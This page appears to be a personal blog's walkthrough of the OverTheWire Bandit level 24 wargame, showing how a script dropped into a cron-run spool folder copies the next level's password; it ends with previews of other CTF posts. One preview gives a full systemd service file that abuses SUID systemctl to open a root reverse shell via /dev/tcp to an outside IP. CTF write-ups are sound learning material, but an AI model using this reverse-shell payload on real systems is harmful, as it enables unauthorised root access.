Skip to main content

Over the Wire - Bandit 24

Bandit 24

Objectives
Level GoalA program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…


Solution

 alets check out the cron.d and see whats there

bandit23@bandit:~$ ls /etc/cron.dcronjob_bandit22  cronjob_bandit23  cronjob_bandit24


cool lets see whats in the cronjob

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null


ok lets check that file in /usr/bin

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh#!/bin/bash
myname=$(whoami)
cd /var/spool/$mynameecho "Executing and deleting all scripts in /var/spool/$myname:"for i in * .*;do    if [ "$i" != "." -a "$i" != ".." ];    thenecho "Handling $i"timeout -s 9 60 ./$irm -f ./$i    fidone


Ok so this script runs all scripts in the folder and then deletes them  /varspool/bandit24 folder

lets try to write a script that will copy the file in /etc/bandit_pass/bandit24 to a temp directory we create

Now in Python

cp /etc/bandit_pass/bandit24 /tmp/asmithbandit24
chmod -R 777/tmp/asmithbandit24/bandit24

this is a pretty simple script but there are some permission issues we need to over come in order for it to work

first we create the directory /tmp/asmithbandit24
mkdir /tmp/asmithbandit24
Now we need to give bandit24 write access to that folder, which we accomplish by giving everyone all the permissions to that folder :)
chomd -R 777 /tmp/asmithbandit24

Now since we know when we move that file to the /var/spool/bandit24 folder it will deleted it after running. I'm going to create a script in the temp folder we created this script will copy the banditpass file and give everyone all the permissions to that file

vi script.shcp /etc/bandit_pass/bandit24 /tmp/asmithbandit24chmod -R 777 /tmp/asmithbandit24/bandit24


I want to create a copy of this file to give bandti24 access to the file before copyting to the /var/spool/bandit24 folder
cat script.sh >> script1.sh

now I'm going to give bandit24 rights to the file by changing the permission before copying over to /var/spool/bandit24. again I'm going to give everyone all the permissions

chmod -R 777 script1.shcp script1.sh /var/spool/bandit24


now we wait for the cron to execute the script and see if bandit24 shows up in my temp folder

bandit23@bandit:/tmp/asmithbandit24$ lsbandit24  script1.sh  script.sh


there it is let's see what it contains


bandit23@bandit:/tmp/asmithbandit24$ cat bandit24UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ














Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The